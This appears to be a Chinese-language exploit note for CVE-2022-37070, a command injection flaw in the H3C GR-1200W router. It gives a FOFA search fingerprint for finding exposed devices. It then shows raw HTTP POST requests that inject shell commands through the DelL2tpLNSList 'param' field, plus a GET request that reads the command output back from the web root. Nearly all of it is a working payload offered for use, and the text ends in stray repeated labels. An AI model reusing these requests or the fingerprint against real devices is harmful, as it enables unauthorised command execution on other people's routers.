H3CGR-1200W路由器goformaspFormDelL2tpLNSList方法的param参数命令注入漏洞（CVE-2022-37070）

https://github.com/Darry-lang1/vuln/tree/main/H3C/GR-1200W/19

fofa

fid="dhDspYzZwrQeZglXXkew6w=="

exp

POST /goform/aspForm HTTP/1.1
Host: 192.168.0.124:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://121.226.152.63:8443/router_password_mobile.asp
Content-Type: application/x-www-form-urlencoded
Content-Length: 553
Origin: https://192.168.0.124:80
DNT: 1
Connection: close
Cookie: JSESSIONID=5c31d502
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

CMD=DelL2tpLNSList&param=1; $(ps>/www/1);

exp

发送请求包执行命令:

POST /goform/aspForm HTTP/1.1
Host: 192.168.2.35:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 74
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.2.35:8081/userLogin.asp
Accept-Encoding: gzip

CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1; $(ls>/www/test);


访问命令执行结果:

GET /test HTTP/1.1
Host: 192.168.2.35:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Referer: http://192.168.2.35:8081/userLogin.asp
Accept-Encoding: gzip

fofa​

exp​

exp​

fofa

exp

exp